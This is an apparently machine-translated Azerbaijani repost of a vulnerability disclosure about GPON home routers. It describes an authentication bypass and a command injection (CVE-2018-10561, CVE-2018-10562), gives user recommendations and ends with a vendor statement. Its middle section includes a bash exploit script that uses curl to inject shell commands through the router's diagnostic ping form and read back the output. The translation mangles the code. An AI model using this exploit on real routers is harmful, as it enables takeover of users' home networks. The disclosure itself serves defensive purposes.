Bir milyondan çox GPON Ev Routerlərində kritik RCE zəifliyi tapıldı


Bu hesabatın dərcindən bəri iki vacib yeniləmə:

  1. Araşdırma qrupumuz təsirli istifadəçilərə kömək edə biləcək bir yamaq yaratdı. Zəhmət olmasa burada yoxlayın
  2. DASAN Zhone Solutions hesabatla bağlı fikirlərini bizə göndərdi. Bu səhifənin sonunda “olduğu kimi” əlavə edirik

Baxış:

Bir sıra GPON ev routerlərində hərtərəfli qiymətləndirmə apardıq. Bu gün bir çox marşrutlaşdırıcı GPON internetindən istifadə edir və cihazlarda bütün identifikasiyanı keçmək üçün bir yol tapdıq (CVE-2018-10561). Bu identifikasiya bypass ilə, başqa bir əmr vermə zəifliyini ortaya qoya bildik (CVE-2018-10562) və cihazdakı əmrləri yerinə yetirin.

İstifadəsi:

GPON firmalarının təhlili zamanı iki fərqli kritik aşkar etdik (CVE-2018-10561) & CVE-2018-10562), birləşdirildikdə cihazda və buna görə də şəbəkədə tam idarəetməyə imkan verə bilər. İlk açığı, qüsuru olan cihazın identifikasiya mexanizmini istismar edir. Bu qüsur hər hansı bir təcavüzkarın bütün identifikasiyasını keçməsinə imkan verir.

Qüsuru identifikasiya edərkən xüsusi yolları yoxlayan HTTP serverlərində tapıla bilər. Bu təcavüzkarın sadə bir hiylədən istifadə edərək istənilən son nöqtədə identifikasiyasını keçməsinə imkan verir.

Şəkilləri / URL-ə əlavə etməklə təcavüzkar son nöqtəni aşa bilər.

Bu həm HTML səhifələrində, həm də GponForm /

Məsələn, əlavə edərək

/menu.html?images/
və ya
/ GponForm / diag_FORM? Şəkillər /

cihazı idarə edə bilərik.

Cihazın funksiyalarını araşdırarkən diaqnostik son nöqtənin ping və traceroute əmrlərini ehtiva etdiyini gördük. Bu əmrlərin ana parametr tərəfindən enjekte edilə biləcəyini anlamaq üçün çox şey lazım deyildi.

Router ping nəticələrini / tmp-də saxladığından və istifadəçi /diag.html-a baxdıqda onu istifadəçiyə ötürdüyündən, əmrləri yerinə yetirmək və autentifikasiya bypass zəifliyi ilə çıxışı olduqca sadədir.

İstismar kodunun aşağıdakı bash versiyasını daxil edirik:
#! / bin / bash

echo “[+] Əmr göndərmək …”
# Fərqli modellər müxtəlif cihazlarda tətil etdiyi üçün əmrləri iki rejimdə işarəli (`) və nöqtəli vergül (;) ilə göndəririk.
curl -k -d “XWebPageName = diag&diag_action = ping&wan_conlist = 0&dest_host = \ `$ 2 \ ‘; $ 2&ipv = 0 “$ 1 / GponForm / diag_Form? şəkillər / 2>/ dev / null 1>/ dev / null
echo “[+] Gözləyir …”
yuxu 3
echo “[+] Ouput alınır …”
curl -k $ 1 / diag.html? images / 2>/ dev / null | grep ‘diag_result =’ | sed -e ‘s / \\ n / \ n / g’

Təsir:

GPON, fiber-optik istifadə edən və xüsusilə populyar olan passiv optik şəbəkənin bir növüdür. İnsanlar GPON istifadə edərkən, marşrutlaşdırıcılar ISP-lər tərəfindən təmin edilir. Videoda bunu görə bilərsiniz bir milyondan çox insan bu tip şəbəkə yönləndiricisini istifadə edir.

Bu həssaslığı bir çox təsadüfi GPON marşrutlaşdırıcılarında sınadıq və açığı hamısında tapıldı. Çünki çox sayda insan bu tip marşrutlaşdırıcılardan istifadə edir, bu zəiflik bütün bir şəbəkə kompromisi ilə nəticələnə bilər.

Tövsiyələr:

  1. Routerinizin GPON şəbəkəsini istifadə etdiyini yoxlayın.
  2. GPON marşrutlaşdırıcılarının hack və istismar edilə biləcəyini unutmayın.
  3. Səhvini düzəltmək üçün nə edə biləcəyini görmək üçün ISP ilə danışın.
  4. Facebookdakı dostlarınızı xəbərdar edin (bölüşmək üçün buraya vurun) və Twitter (tweet üçün buraya vurun).

Yeniləmə: DZS-nin təsdiqləmə bypass istismarına dair bəyanatı

DASAN Zhone Solutions, Inc son dövrlərdə bəzi DZS GPON Şəbəkə interfeysi qurğularının (NID), daha çox marşrutlaşdırıcı olaraq bilinən bir identifikasiya bypass istismarına həssas ola biləcəyi ilə bağlı məlumatları araşdırdı..

DZS, müəyyən bir proqram buraxılışlarında işləyərkən ZNID-GPON-25xx seriyası və müəyyən H640series GPON ONT-lərin bu zəiflikdən təsirləndiyini müəyyən etdi. Bu günə qədər DZS-ə bu zəiflikdən heç bir xidmət təsiri bildirilməyib. Daxili araşdırmadan sonra potensial təsirin vpnMentor tərəfindən bildirildiyindən daha çox məhdud olduğunu müəyyən etdik. DZS satış qeydlərinə görə, bu günə qədər toplanmış sahə məlumatları ilə birlikdə, ola biləcək GPON ONT ədədlərinin sayını təxmin etdik. potensial olaraq 240.000-dən az təsir göstərmişdir. Bundan əlavə, məhsulların həyat dövrlərindəki nisbi yetkinliyi nəzərə alsaq, təsirin daha az cihazla məhdudlaşacağını düşünürük.

Məhsul tarixi

Bu zəifliyi təqdim edən proqram daxil olmaqla DZS ZNID-GPON-25xx və müəyyən H640 seriyalı ONTlər, bir OEM təchizatçısı tərəfindən hazırlanmış və DZS tərəfindən yenidən satılmışdır. 9 ildən çox əvvəl hazırlanmış və satışa çıxarılan bu məhsulların əksəriyyəti artıq davamlı xidmət müddətindən yaxşı keçmişlər. Proqram təminatına dair müqavilələr artıq bu məhsulların əksəriyyəti üçün təklif olunmadığından bu sahədə hələ də fəal şəkildə istifadə olunan bölmələrin ümumi sayı barədə birbaşa məlumatımız yoxdur..

Görüntü imkanı

DZS, bu zəiflik modellərini satın alan bütün müştərilərə məlumat verdi. Hər bir müştəri ilə hələ də sahədə quraşdırıla bilən bölmələr üçün problemi həll etmək üçün metodları qiymətləndirməyə kömək etmək üçün çalışırıq. Quraşdırılmış avadanlıqların vəziyyətini necə həll etmək barədə qərar qəbul etmək hər bir müştərinin ixtiyarı olacaqdır.

DZS-nin vəzifəsi, bütün həllərinin sənayedə ən yüksək təhlükəsizlik standartlarına cavab verməsini təmin etməkdir. Təhlükəsizlik dizaynımızı və sınaq metodologiyamızı nəzərdən keçirmək və daim inkişaf etdirmək üçün bunu və hər fürsəti əhatə edirik.

Kim Martin Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map